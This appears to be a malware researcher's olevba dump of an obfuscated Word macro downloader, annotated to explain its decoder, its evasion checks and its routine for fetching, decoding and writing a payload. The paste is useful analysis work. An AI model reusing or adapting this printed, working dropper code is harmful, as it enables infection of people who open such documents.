dynamoo

Malicious Word macro

Nov 26th, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS-HB-V malware.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: malware.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. #If VBA7 Then
      ' Imports an external function from a library called "Lkt6o8pmvGrNO", once for VBA7 hosts
      ' (PtrSafe) and once for older hosts. Library and alias names look randomly generated.
      ' Document_Open calls this import once and then tests Err.Number, so the declaration
      ' appears to exist only to provoke a predictable load error -- confirm in a sandbox.
  16. Private Declare PtrSafe Function FiOhvKV5yT Lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV" (ByVal InHWN3QclIE As String, JHaob5RaBb0pUW As Long) As Long
  17. #Else
  18. Private Declare Function FiOhvKV5yT lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV"(byval InHWN3QclIE as String, JHaob5RaBb0pUW as Long ) as Long
  19. #End If
      ' Module-level string: set in Document_Open from NQfyvvczlB and spliced into the dropped
      ' file's path in Yo0cZy9rsLWc833.
  20. Private GpkKWN3 As String
  21. Function N850BCurHo(ByVal LemiyA6QZnuCYC As String, XUn6QwHKyAv As String) As String
      ' String decoder used for every obfuscated literal in this module and for the downloaded
      ' response body.
      '   LemiyA6QZnuCYC : encoded text
      '   XUn6QwHKyAv    : key string
      '   Returns        : the input XORed byte-by-byte with a key-derived stream, as a String.
      ' The transform is a plain XOR keystream that depends only on the key and the byte position,
      ' so an analyst can re-implement it offline to recover the strings without opening the document.
      ' The recurring "X = n / If X + Y > 1 Then ... End If / Y = m" groups and the numeric
      ' comments are filler: none of those variables feeds the decoding below.
  22. PevSFR3rv0e2RZK = 39
  23. If PevSFR3rv0e2RZK + MJDM0hu5rU7Tdb > 1 Then
  24. MJDM0hu5rU7Tdb = 1 + 18
  25. '19 Clra 16 25
  26. End If
  27. MJDM0hu5rU7Tdb = 69
  28. '82 96 55 EHgu
      ' Run-time errors inside the decoder are suppressed.
  29. On Error Resume Next
  30. SQoiCuInevSFR3rv0 = 82
  31. If SQoiCuInevSFR3rv0 + NsNJTqkk3w > 1 Then
  32. NsNJTqkk3w = 72 + 29
  33. '32 GvriOI9 94 34
  34. End If
  35. NsNJTqkk3w = 44
  36. '59 39 1 HSHSe4Iv
      ' GJE0Xk = data bytes, CtAp9AJ0lBLNg = key bytes, Uu3ahNk9NV = 286-entry lookup table.
      ' Only L8aV9L4vUWh is typed Boolean; the untyped names before it default to Variant.
  37. Dim GJE0Xk() As Byte, Uu3ahNk9NV(0 To 285) As Integer, CtAp9AJ0lBLNg() As Byte, NyTk5LjHttv, Hboyl0jeJwPSe, L7j2iquXfw8f, HlgcUkRQ3VZtHDYq, L8aV9L4vUWh As Boolean
  38. It9Acrpc7M = 30
  39. If It9Acrpc7M + DrjiAY5ezWAm > 1 Then
  40. DrjiAY5ezWAm = 53 + 31
  41. '26 RCZpY 14 49
  42. End If
  43. DrjiAY5ezWAm = 44
  44. '87 56 76 HPqsPooeMN9zRPs3
      ' (64 + 1 + 64 - 1) = 128 = vbFromUnicode: encoded text -> byte array.
  45. GJE0Xk = StrConv(LemiyA6QZnuCYC, (64 + 1 + 64 - 1))
  46. VwkYpXxUG = 28
  47. If VwkYpXxUG + L7MtzHaiOhvKV > 1 Then
  48. L7MtzHaiOhvKV = 60 + 12
  49. '10 HbZCtRcd4hpmvGrNO 41 22
  50. End If
  51. L7MtzHaiOhvKV = 27
  52. '11 59 15 IlWZ1yGPfpiG
      ' (64 + 5 + 64 - 5) = 128 again: key string -> byte array.
  53. CtAp9AJ0lBLNg() = StrConv(XUn6QwHKyAv, (64 + 5 + 64 - 5))
  54. C1aZX3huwbllRm = 94
  55. If C1aZX3huwbllRm + Orcx0psolAwdff4 > 1 Then
  56. Orcx0psolAwdff4 = 49 + 58
  57. '84 SgJEI38zx 78 45
  58. End If
  59. Orcx0psolAwdff4 = 71
  60. '20 20 72 TmV0hQRiff
      ' Index of the last key byte.
  61. Hboyl0jeJwPSe = UBound(CtAp9AJ0lBLNg)
  62. FXBI0cjkxDlMD = 32
  63. If FXBI0cjkxDlMD + CJqQ7WXZNbh3E > 1 Then
  64. CJqQ7WXZNbh3E = 10 + 5
  65. '92 Fh3vFSWMRoJaMPe 28 22
  66. End If
  67. CJqQ7WXZNbh3E = 66
  68. '8 55 66 TytC1onRx
      ' Table setup, step 1: entries 0..255 hold their own index.
  69. For NyTk5LjHttv = 0 To (127.5 + 7 + 127.5 - 7)
  70. Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv
  71. Next NyTk5LjHttv
      ' Step 2: entries 256..285 hold (index Xor 256), i.e. 0..29.
  72. For NyTk5LjHttv = (128 + 2 + 128 - 2) To (142.5 + 2 + 142.5 - 2)
  73. Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Xor (128 + 7 + 128 - 7)
  74. Next NyTk5LjHttv
      ' Step 3: for i = 1..6, overwrite entries 250..255 with the last six key bytes (in reverse)
      ' and entries 0..5 with key(i-1) Xor (255 - that same trailing key byte).
  75. For NyTk5LjHttv = 1 To (3 + 8 + 3 - 8)
  76. Uu3ahNk9NV(NyTk5LjHttv + (124.5 + 1 + 124.5 - 1)) = CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv)
  77. Uu3ahNk9NV(NyTk5LjHttv - 1) = CtAp9AJ0lBLNg(NyTk5LjHttv - 1) Xor ((127.5 + 6 + 127.5 - 6) - CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv))
  78. Next NyTk5LjHttv
      ' Main loop state: L7j2iquXfw8f = key index, HlgcUkRQ3VZtHDYq = table index,
      ' L8aV9L4vUWh = flag selecting where the table index restarts.
  79. L8aV9L4vUWh = False
  80. L7j2iquXfw8f = 0
  81. HlgcUkRQ3VZtHDYq = 0
  82. For NyTk5LjHttv = 0 To UBound(GJE0Xk)
      ' Key index wraps to 0 after the last key byte.
  83. If L7j2iquXfw8f > Hboyl0jeJwPSe Then L7j2iquXfw8f = 0
      ' Table index past 285: restart at 0 when the flag is False, at 5 when it is True,
      ' toggling the flag each time.
  84. If HlgcUkRQ3VZtHDYq > (142.5 + 6 + 142.5 - 6) And L8aV9L4vUWh = False Then HlgcUkRQ3VZtHDYq = 0: L8aV9L4vUWh = Not (L8aV9L4vUWh)
  85. If HlgcUkRQ3VZtHDYq > (142.5 + 1 + 142.5 - 1) And L8aV9L4vUWh = True Then HlgcUkRQ3VZtHDYq = (2.5 + 4 + 2.5 - 4): L8aV9L4vUWh = Not (L8aV9L4vUWh)
      ' data byte = data byte Xor table entry Xor key byte.
  86. GJE0Xk(NyTk5LjHttv) = (GJE0Xk(NyTk5LjHttv) Xor (Uu3ahNk9NV(HlgcUkRQ3VZtHDYq) Xor CtAp9AJ0lBLNg(L7j2iquXfw8f)))
  87. L7j2iquXfw8f = L7j2iquXfw8f + 1
  88. HlgcUkRQ3VZtHDYq = HlgcUkRQ3VZtHDYq + 1
  89. Next NyTk5LjHttv
  90. WuyDMqJlc9EExGn = 95
  91. If WuyDMqJlc9EExGn + MD6vOtbeXg08Apf > 1 Then
  92. MD6vOtbeXg08Apf = 46 + 67
  93. '56 FRKdQgv8nI4s 91 59
  94. End If
  95. MD6vOtbeXg08Apf = 3
  96. '71 91 4 Dr9gJTFhJbaTyvr
      ' (32 + 6 + 32 - 6) = 64 = vbUnicode: decoded bytes -> String, returned to the caller.
  97. N850BCurHo = StrConv(GJE0Xk(), (32 + 6 + 32 - 6))
  98. PQtmFj4 = 59
  99. If PQtmFj4 + Jy5AeFk8EPh5 > 1 Then
  100. Jy5AeFk8EPh5 = 81 + 87
  101. '16 Y28Ireu 57 60
  102. End If
  103. Jy5AeFk8EPh5 = 78
  104. '97 87 44 QSITYPlOzd9wZo5wK
  105. End Function
  106. Sub Document_Open()
       ' Auto-exec entry point: runs when the Word document is opened (olevba's AutoExec hit).
       ' Flow: long counting loop -> call the bogus DLL import -> if that failed with error 53,
       ' pick a random name suffix and start the download routine Yo0cZy9rsLWc833; on any other
       ' outcome only the decoy routine PGYDqcNIiY runs.
       ' The "X = n / If X + Y > 1 Then ... End If / Y = m" groups and numeric comments are filler.
  107. Y8zxt6Msdpa = 73
  108. If Y8zxt6Msdpa + IffQgv8nI4s > 1 Then
  109. IffQgv8nI4s = 85 + 23
  110. '38 NlQBbSx8CvjG5n 18 78
  111. End If
  112. IffQgv8nI4s = 69
  113. '70 67 77 SK2Okf9
       ' Errors are suppressed so the failing import below can be inspected through Err.Number.
  114. On Error Resume Next
  115. PKaAwdff4 = 59
  116. If PKaAwdff4 + UGTAOx > 1 Then
  117. UGTAOx = 3 + 71
  118. '91 BpX8trlI24f 4 95
  119. End If
  120. UGTAOx = 18
  121. '51 79 94 Seuq3p2oT0
  122. Dim DrqjA As Long, YsFjPuyG As Long, YhNAv As Long, V6cC3scUY4zddH99R As Long
  123. Pn2j04QQZ = 39
  124. If Pn2j04QQZ + PhB4lG17FG95 > 1 Then
  125. PhB4lG17FG95 = 15 + 88
  126. '41 WCYB5Gg 83 81
  127. End If
  128. PhB4lG17FG95 = 35
  129. '33 6 14 T85wPN55plLSy
       ' DrqjA is the bound for the counting loop below (about 98 million iterations).
  130. DrqjA = 97933779: YsFjPuyG = 0: YhNAv = 0
  131. A9brznS9 = 39
  132. If A9brznS9 + NZmCtQE > 1 Then
  133. NZmCtQE = 3 + 59
  134. '89 Gn0vbN 52 64
  135. End If
  136. NZmCtQE = 1
  137. '17 96 57 WjrO2i
       ' Loop that only increments a counter. Presumably a delay / emulation-timeout guard:
       ' an analysis engine that caps loop iterations would leave YhNAv <> DrqjA -- confirm.
  138. For YsFjPuyG = 1 To DrqjA
  139. YhNAv = YhNAv + 1
  140. Next YsFjPuyG
  141. SC5Gsa2L8x9 = 53
  142. If SC5Gsa2L8x9 + YQfGqOLqlO > 1 Then
  143. YQfGqOLqlO = 61 + 11
  144. '61 C5Ml9aEwx 82 71
  145. End If
  146. YQfGqOLqlO = 7
  147. '1 44 86 JbPkJ1m84n
       ' True only when the counting loop above ran to completion.
  148. If YhNAv = DrqjA Then
  149. MBLZvB3itxy = 28
  150. If MBLZvB3itxy + VGYVXAeUo > 1 Then
  151. VGYVXAeUo = 10 + 37
  152. '56 OwEp3rMGmB 24 23
  153. End If
  154. VGYVXAeUo = 98
  155. '98 51 67 YfcNwjt
       ' Glu is built here and never read afterwards in this listing.
  156. Dim JdQXv As Integer, Glu As String
  157. For JdQXv = 6 To 931
  158. Glu = Glu + JdQXv
  159. Next
  160. QMC2wbN5Ml9a = 30
  161. If QMC2wbN5Ml9a + JLJBTPQC0v8nPRi > 1 Then
  162. JLJBTPQC0v8nPRi = 75 + 66
  163. '23 H1FnrBinFMXuiTr7q 26 88
  164. End If
  165. JLJBTPQC0v8nPRi = 27
  166. '38 53 33 MommQAvjlo
       ' Calls the import declared against the library "Lkt6o8pmvGrNO". The return value is
       ' never used; what matters is the error this call leaves behind.
  167. V6cC3scUY4zddH99R = FiOhvKV5yT("Woslk2fer8", 13)
  168. NEVW = 27
  169. If NEVW + AbNNqkZ7MBaO > 1 Then
  170. AbNNqkZ7MBaO = 85 + 37
  171. '9 TkPX49TibqGBJxshx 40 47
  172. End If
  173. AbNNqkZ7MBaO = 52
  174. '36 84 40 PATiSzZ0SHp
       ' (26.5 + 1 + 26.5 - 1) = 53, VBA's "File not found" error, which is what a Declare
       ' against a missing library raises. Presumably an environment check: a host that stubs
       ' out Declare calls would not produce 53 and would fall to the decoy branch -- confirm.
  175. If Err.Number = (26.5 + 1 + 26.5 - 1) Then
  176. ALJBTPQC0v8nPRi = 63
  177. If ALJBTPQC0v8nPRi + OgAQFxX3NoRJzF0 > 1 Then
  178. OgAQFxX3NoRJzF0 = 76 + 90
  179. '49 Bdt9CAhqI 73 72
  180. End If
  181. OgAQFxX3NoRJzF0 = 4
  182. '11 16 48 TaXuqpe9brzn
  183. Err.Clear
  184. GdnAtw6pW2Ddd = 21
  185. If GdnAtw6pW2Ddd + Bn4b3DBA1 > 1 Then
  186. Bn4b3DBA1 = 57 + 95
  187. '33 LntwxxRUQfG 22 2
  188. End If
  189. Bn4b3DBA1 = 62
  190. '79 80 77 UWnIyleBDeMMQkBoa
       ' Random numeric string from NQfyvvczlB, later used as part of the dropped file's name.
  191. GpkKWN3 = NQfyvvczlB
  192. DFx2CkP6uLciomp = 15
  193. If DFx2CkP6uLciomp + YxN3SKC7rbd4Y0 > 1 Then
  194. YxN3SKC7rbd4Y0 = 37 + 69
  195. '98 HPrpdzlNL 13 16
  196. End If
  197. YxN3SKC7rbd4Y0 = 34
  198. '79 69 26 G1kJpKeLjvHFTRm
       ' Download, write and run routine.
  199. Yo0cZy9rsLWc833
  200. Else
  201. Cfh6QC = 1
  202. If Cfh6QC + SahItA7q > 1 Then
  203. SahItA7q = 51 + 28
  204. '23 HCOoCyyztc 12 46
  205. End If
  206. SahItA7q = 41
  207. '84 27 74 Ktvz0LH4pnr
       ' Import did not fail with 53: only the decoy routine runs.
  208. PGYDqcNIiY
  209. CVrJQakokY = 20
  210. If CVrJQakokY + Y3Eih8b7DEsD5mvG > 1 Then
  211. Y3Eih8b7DEsD5mvG = 49 + 34
  212. '4 ILogRYp5sBH4wIB 69 73
  213. End If
  214. Y3Eih8b7DEsD5mvG = 13
  215. '68 76 4 PMgXukJXdidChXD
  216. End If
  217. GD8V9NxlguCc = 31
  218. If GD8V9NxlguCc + Cbj3Mm1 > 1 Then
  219. Cbj3Mm1 = 14 + 40
  220. '60 Re2uopTYl 27 26
  221. End If
  222. Cbj3Mm1 = 2
  223. '75 28 70 PYPrON7WK2JzAOBM
  224. Else
  225. SkzzbsvfSyz = 30
  226. If SkzzbsvfSyz + OKqrI > 1 Then
  227. OKqrI = 17 + 31
  228. '88 Kj3Mm1XX0vAd4 14 13
  229. End If
  230. OKqrI = 43
  231. '50 56 40 HViUsnLUZHz
       ' Counting loop did not complete: only the decoy routine runs.
  232. PGYDqcNIiY
  233. OEjP2fwXjVZgphAd = 48
  234. If OEjP2fwXjVZgphAd + O216Y38Y2IQM > 1 Then
  235. O216Y38Y2IQM = 50 + 91
  236. '94 PGa6IxNKb0 13 58
  237. End If
  238. O216Y38Y2IQM = 21
  239. '77 8 70 Yn2V1Js3WRXItf4P
  240. End If
  241. B1bVxGQc8 = 31
  242. If B1bVxGQc8 + CHKnEMtktO > 1 Then
  243. CHKnEMtktO = 49 + 94
  244. '84 Vcn9fY7O 41 45
  245. End If
  246. CHKnEMtktO = 8
  247. '46 56 72 J375rwVno
  248. End Sub
  249. Sub B12q0RLAU(YAz6wXfrk6f5dv As String, Dz1TOyYXiEI9X1 As String)
       ' File writer: creates the file named by YAz6wXfrk6f5dv and writes Dz1TOyYXiEI9X1 into it.
       ' Called from Yo0cZy9rsLWc833 with the drop path and the decoded download.
       ' The "X = n / If X + Y > 1 Then ... End If / Y = m" groups and numeric comments are filler.
  250. Dim Pp3rrlsgf94PVXP6U As Object
  251. VjnPC7wODO4Jx = 68
  252. If VjnPC7wODO4Jx + Rqk3uXtteGEZk > 1 Then
  253. Rqk3uXtteGEZk = 89 + 1
  254. '93 FhOzcnGer 16 48
  255. End If
  256. Rqk3uXtteGEZk = 50
  257. '91 94 13 SgNKb0
       ' The ProgID is a 26-character string decoded at run time by N850BCurHo; its plaintext is
       ' not on this page. The CreateTextFile / Write / Close members used below are consistent
       ' with a file-system scripting object -- confirm by decoding.
  258. Set Pp3rrlsgf94PVXP6U = CreateObject(N850BCurHo(Chr$(245) + Chr$(206) + Chr$(216) + Chr$(207) + Chr$(245) + Chr$(178) + Chr$(58) + Chr$(59) + Chr$(54) + Chr$(78) + Chr$(14) + Chr$(32) + Chr$(52) + Chr$(81) + Chr$(39) + Chr$(47) + Chr$(54) + Chr$(55) + Chr$(46) + Chr$(23) + Chr$(25) + Chr$(53) + Chr$(40) + Chr$(75) + Chr$(1) + Chr$(52), "BBT9zYURYi"))
  259. Oy07ZXh375rw = 66
  260. If Oy07ZXh375rw + IafTt7I6 > 1 Then
  261. IafTt7I6 = 95 + 81
  262. '51 IPwAQevkxJXOs 16 21
  263. End If
  264. IafTt7I6 = 60
  265. '15 24 50 KL1NNvX9M
       ' Mixed-case member names (CREATEtEXTFILe, WRiTE) still resolve because late-bound calls
       ' are case-insensitive; olevba's CreateTextFile and Write hits come from here.
  266. With Pp3rrlsgf94PVXP6U.CREATEtEXTFILe(YAz6wXfrk6f5dv)
  267. FnGerJrNK5Me = 59
  268. If FnGerJrNK5Me + D7E2ALYP > 1 Then
  269. D7E2ALYP = 18 + 87
  270. '79 MHSxliGq 57 96
  271. End If
  272. D7E2ALYP = 78
  273. '60 87 7 RwchV
  274. .WRiTE (Dz1TOyYXiEI9X1)
  275. WKjDoHr5iKzkpVwg2 = 72
  276. If WKjDoHr5iKzkpVwg2 + QcB20uYVs9TKjI > 1 Then
  277. QcB20uYVs9TKjI = 24 + 23
  278. '53 T86tdYttAG8H2 34 39
  279. End If
  280. QcB20uYVs9TKjI = 24
  281. '71 27 86 HZonet6216Y38Y2I
  282. .Close
  283. JFqOLICehY = 88
  284. If JFqOLICehY + H5Gi4s6Oh > 1 Then
  285. H5Gi4s6Oh = 28 + 83
  286. '91 YfJW0b1SpgJJ 19 39
  287. End If
  288. H5Gi4s6Oh = 79
  289. '5 80 54 R2EarR9dQ6
  290. End With
  291. Bhv4rFyKDKXTO = 95
  292. If Bhv4rFyKDKXTO + KKSWCkv > 1 Then
  293. KKSWCkv = 96 + 38
  294. '41 T61Q0H4n2uSis 59 5
  295. End If
  296. KKSWCkv = 68
  297. '25 55 18 Qcwh3Dw
  298. Set Pp3rrlsgf94PVXP6U = Nothing
  299. RyXDLrCTEUdfgw = 27
  300. If RyXDLrCTEUdfgw + UUTkQyfMsfxt > 1 Then
  301. UUTkQyfMsfxt = 76 + 27
  302. '48 TkQyfMsf 37 72
  303. End If
  304. UUTkQyfMsfxt = 66
  305. '10 52 84 VFnmj
  306. End Sub
  307. Sub AzGSEXj0198(YgWPvZP1GI6MAx6 As Long)
       ' Delay helper: spins until Timer has advanced by YgWPvZP1GI6MAx6 seconds, yielding with
       ' DoEvents on each pass. Called from Yo0cZy9rsLWc833 with a value of 2.
       ' The "X = n / If X + Y > 1 Then ... End If / Y = m" groups and numeric comments are filler.
  308. EvGXxSr = 14
  309. If EvGXxSr + MwNvccke53sI > 1 Then
  310. MwNvccke53sI = 15 + 12
  311. '21 X9w2oS3F 92 78
  312. End If
  313. MwNvccke53sI = 92
  314. '51 3 74 NYr9z
  315. Dim HTvFxkntQn7 As Long
  316. Wsu2EarR9dQ = 17
  317. If Wsu2EarR9dQ + CvU49QGChAHz2YU > 1 Then
  318. CvU49QGChAHz2YU = 77 + 24
  319. '58 C1MjOEfC3K7tGTTZ 8 58
  320. End If
  321. CvU49QGChAHz2YU = 80
  322. '68 4 71 QinpPH
       ' Deadline = current Timer value plus the requested number of seconds.
  323. HTvFxkntQn7 = Timer + YgWPvZP1GI6MAx6
  324. Do While Timer < HTvFxkntQn7
  325. DoEvents
  326. Loop
  327. P26QLde5nGzV = 25
  328. If P26QLde5nGzV + Ab4PHJ9i3Pqz > 1 Then
  329. Ab4PHJ9i3Pqz = 8 + 34
  330. '54 C3bLu3db 21 20
  331. End If
  332. Ab4PHJ9i3Pqz = 95
  333. '69 22 64 IxyptdjM
  334. End Sub
  335. Sub Yo0cZy9rsLWc833()
       ' Download-and-run routine, reached from Document_Open only after its environment check.
       ' Steps visible below: build a drop path under an environment-variable directory, request
       ' a first URL and, if the status is not 200, a second one, decode the response body with
       ' N850BCurHo, write it to the drop path via B12q0RLAU, then launch that path through a
       ' late-bound object's Run method.
       ' Every string (variable name, path parts, ProgIDs, HTTP verb, URLs, payload key) is
       ' decoded at run time; none of the plaintext values appears on this page.
       ' Triage pointers: look for a file created by the Office process in a per-user directory
       ' with a numeric name component, followed by a child process started from that path.
       ' The "X = n / If X + Y > 1 Then ... End If / Y = m" groups and numeric comments are filler.
  336. HtdjMDb8fByV = 35
  337. If HtdjMDb8fByV + PgGhGyO1BQj > 1 Then
  338. PgGhGyO1BQj = 38 + 1
  339. '40 QUJFvPh2RB8 50 66
  340. End If
  341. PgGhGyO1BQj = 45
  342. '7 24 25 EpUcR3zs
  343. Dim G5UczWAvCd8 As String, Jy6OeQYzbkLfj4 As Object
  344. IBDicnTaoZ = 62
  345. If IBDicnTaoZ + SCrQim0cZ3bLu3d > 1 Then
  346. SCrQim0cZ3bLu3d = 83 + 94
  347. '86 BbDpG 10 42
  348. End If
  349. SCrQim0cZ3bLu3d = 44
  350. '85 87 6 Tee9PKR9nm
       ' Drop path = Environ(<decoded 7-character name>) & <decoded 18-character fragment>
       '             & GpkKWN3 (random number set in Document_Open) & <decoded 4-character suffix>.
       ' The suffix is presumably a file extension -- confirm by decoding.
  351. G5UczWAvCd8 = Environ(N850BCurHo(Chr$(207) + Chr$(227) + Chr$(223) + Chr$(162) + Chr$(241) + Chr$(189) + Chr$(81), "INw1nf6o9PlQb")) & N850BCurHo(Chr$(231) + Chr$(236) + Chr$(254) + Chr$(248) + Chr$(214) + Chr$(130) + Chr$(19) + Chr$(62) + Chr$(5) + Chr$(27) + Chr$(41) + Chr$(40) + Chr$(85) + Chr$(71) + Chr$(55) + Chr$(16) + Chr$(43) + Chr$(16), "Jl3XOXwRJDj") & GpkKWN3 & N850BCurHo(Chr$(128) + Chr$(203) + Chr$(215) + Chr$(211), "YTfXIPQQT")
  352. SDKtuw = 90
  353. If SDKtuw + P9MZ56WLHCqol > 1 Then
  354. P9MZ56WLHCqol = 62 + 74
  355. '88 FKO 21 72
  356. End If
  357. P9MZ56WLHCqol = 70
  358. '2 82 87 X6sACIZZnE1Gh8
       ' Late-bound object from a decoded 17-character ProgID. The Open / send / Status /
       ' responseBody members used below show it is an HTTP request object.
  359. Set Jy6OeQYzbkLfj4 = CreateObject(N850BCurHo(Chr$(193) + Chr$(211) + Chr$(241) + Chr$(215) + Chr$(218) + Chr$(205) + Chr$(58) + Chr$(32) + Chr$(54) + Chr$(125) + Chr$(63) + Chr$(3) + Chr$(51) + Chr$(22) + Chr$(27) + Chr$(17) + Chr$(26), "AJZmEsS"))
  360. Hpwu6Bl = 72
  361. If Hpwu6Bl + YeBQPr1wAvqimGhpX > 1 Then
  362. YeBQPr1wAvqimGhpX = 95 + 2
  363. '30 HCXroKyiQXE3xbOh 71 73
  364. End If
  365. YeBQPr1wAvqimGhpX = 91
  366. '11 1 57 VbiBYEmq
       ' First request: decoded 3-character method, decoded 31-character URL with a fresh random
       ' number from NQfyvvczlB appended (so the requested URL differs on each run). The third
       ' argument 0 presumably selects a synchronous request -- confirm against the object type.
  367. Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(193) + Chr$(232) + Chr$(243), "Bm1NBcQZfBt9jXRy3"), N850BCurHo(Chr$(246) + Chr$(192) + Chr$(199) + Chr$(186) + Chr$(137) + Chr$(191) + Chr$(101) + Chr$(36) + Chr$(8) + Chr$(10) + Chr$(47) + Chr$(34) + Chr$(42) + Chr$(16) + Chr$(52) + Chr$(83) + Chr$(57) + Chr$(45) + Chr$(29) + Chr$(14) + Chr$(125) + Chr$(48) + Chr$(36) + Chr$(87) + Chr$(62) + Chr$(67) + Chr$(120) + Chr$(58) + Chr$(13) + Chr$(11) + Chr$(102), "GFSoL5LKaq") & NQfyvvczlB, 0
  368. Ofj = 9
  369. If Ofj + W5u9qigla6 > 1 Then
  370. W5u9qigla6 = 59 + 81
  371. '69 U7QtWvY42JwDW 5 72
  372. End If
  373. W5u9qigla6 = 16
  374. '84 6 17 QdLhShR
  375. Jy6OeQYzbkLfj4.seND
       ' (100 + 8 + 100 - 8) = 200: on HTTP 200 jump straight to the write-and-run label.
  376. If Jy6OeQYzbkLfj4.Status = (100 + 8 + 100 - 8) Then
  377. P92RvX1OyI = 77
  378. If P92RvX1OyI + Tlpy4pOJB > 1 Then
  379. Tlpy4pOJB = 1 + 33
  380. '61 AGoCC 3 78
  381. End If
  382. Tlpy4pOJB = 96
  383. '42 33 89 Bu3P6
  384. GoTo KNCjFjtSsUu5k
       ' Unreachable filler after the GoTo.
  385. H0oXKiA6m = 76
  386. If H0oXKiA6m + XCPhIXE1Gh8 > 1 Then
  387. XCPhIXE1Gh8 = 4 + 23
  388. '90 HiJtOsluH 89 65
  389. End If
  390. XCPhIXE1Gh8 = 65
  391. '18 34 58 TOzDi3HsPBkL8
  392. Else
  393. AE7aUiUy1UeC = 8
  394. If AE7aUiUy1UeC + JkwSoTVijR3AJ > 1 Then
  395. JkwSoTVijR3AJ = 25 + 26
  396. '23 HXRWM 32 77
  397. End If
  398. JkwSoTVijR3AJ = 90
  399. '4 62 87 EeVp
       ' Fallback request: a second decoded method/URL pair, again with a random number appended.
  400. Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(252) + Chr$(251) + Chr$(222), "UgAiwo1aaBuAD6"), N850BCurHo(Chr$(213) + Chr$(191) + Chr$(198) + Chr$(254) + Chr$(188) + Chr$(129) + Chr$(31) + Chr$(49) + Chr$(30) + Chr$(30) + Chr$(46) + Chr$(76) + Chr$(38) + Chr$(73) + Chr$(58) + Chr$(2) + Chr$(0) + Chr$(53) + Chr$(74) + Chr$(127) + Chr$(65) + Chr$(43) + Chr$(2) + Chr$(73) + Chr$(63) + Chr$(66) + Chr$(118) + Chr$(71) + Chr$(61) + Chr$(3) + Chr$(80), "QyqM4B6") & NQfyvvczlB, 0
  401. Cuo52olTIbaOgrZ = 94
  402. If Cuo52olTIbaOgrZ + GWaauGfzntoPg1G > 1 Then
  403. GWaauGfzntoPg1G = 63 + 84
  404. '95 TNk2R 87 11
  405. End If
  406. GWaauGfzntoPg1G = 43
  407. '45 86 89 IGdAaRv6BeMop0Yaa
  408. Jy6OeQYzbkLfj4.seND
  409. KDEkUqsxrgrl = 9
  410. If KDEkUqsxrgrl + NKenP > 1 Then
  411. NKenP = 49 + 26
  412. '44 Mj3bKHSNEWmeIz 89 79
  413. End If
  414. NKenP = 36
  415. '40 3 41 YY5zn3cWqt5
       ' (100 + 3 + 100 - 3) = 200 again for the fallback response.
  416. If Jy6OeQYzbkLfj4.Status = (100 + 3 + 100 - 3) Then
  417. NpvGZ5rgZCRTUq = 61
  418. If NpvGZ5rgZCRTUq + QLq6CSMT43j > 1 Then
  419. QLq6CSMT43j = 38 + 33
  420. '22 Q3G7TIMG 57 51
  421. End If
  422. QLq6CSMT43j = 94
  423. '63 84 95 LLcyM2peGdAaRv6
  424. GoTo KNCjFjtSsUu5k
       ' Unreachable filler after the GoTo.
  425. VKk7tqLDBK = 93
  426. If VKk7tqLDBK + NMYJ7d > 1 Then
  427. NMYJ7d = 66 + 74
  428. '24 Uf3dQjvfSG 74 96
  429. End If
  430. NMYJ7d = 84
  431. '20 14 58 DMan98xPTEU
  432. End If
  433. SdBIZAZSNSJfKpj = 52
  434. If SdBIZAZSNSJfKpj + GKdU3l > 1 Then
  435. GKdU3l = 6 + 44
  436. '4 Uv4zBtOced 50 84
  437. End If
  438. GKdU3l = 8
  439. '85 80 68 DuZIfom1Aeq1A
  440. End If
  441. Rr4tm1pHovm = 22
  442. If Rr4tm1pHovm + OOkRBHQv2V > 1 Then
  443. OOkRBHQv2V = 95 + 48
  444. '91 TRENEsFLooSq 88 43
  445. End If
  446. OOkRBHQv2V = 7
  447. '41 14 22 PpmSWyrtSkqQ
       ' Neither request returned 200: leave without writing or running anything.
  448. Exit Sub
  449. TLNBz3utPpNHz3 = 97
  450. If TLNBz3utPpNHz3 + YAPZSY4KGk8Mmi > 1 Then
  451. YAPZSY4KGk8Mmi = 17 + 84
  452. '83 D0QxudBKVKW 59 59
  453. End If
  454. YAPZSY4KGk8Mmi = 12
  455. '28 52 6 GKxbCDNIqKCpcq
       ' Write-and-run label, reached only through the two GoTo statements above.
  456. KNCjFjtSsUu5k:
  457. RLbJpjLUKSC17r = 22
  458. If RLbJpjLUKSC17r + VqWASNqmC4f3jp > 1 Then
  459. VqWASNqmC4f3jp = 95 + 48
  460. '91 PfamB 88 43
  461. End If
  462. VqWASNqmC4f3jp = 7
  463. '41 14 22 OFE
       ' (1 + 9 + 1 - 9) = 2: wait two seconds via the Timer/DoEvents helper.
  464. AzGSEXj0198 (1 + 9 + 1 - 9)
  465. AC6Seuk = 41
  466. If AC6Seuk + GqPWcAOvvXX > 1 Then
  467. GqPWcAOvvXX = 26 + 19
  468. '41 CQLLEMenC 73 2
  469. End If
  470. GqPWcAOvvXX = 43
  471. '20 38 83 DofpgnNPhc
       ' The response body is converted with StrConv(..., 64) (vbUnicode) and passed through
       ' N850BCurHo with a key that is itself decoded, then written to the drop path. The
       ' download is therefore transformed before it reaches disk, so content inspection of
       ' the HTTP response alone is unlikely to show the final file.
  472. B12q0RLAU G5UczWAvCd8, N850BCurHo(StrConv(Jy6OeQYzbkLfj4.resPOnSeBodY, (32 + 3 + 32 - 3)), N850BCurHo(Chr$(211) + Chr$(235) + Chr$(202) + Chr$(160) + Chr$(216) + Chr$(249) + Chr$(112) + Chr$(89) + Chr$(15) + Chr$(111) + Chr$(86), "MWwoL0A7qSjF"))
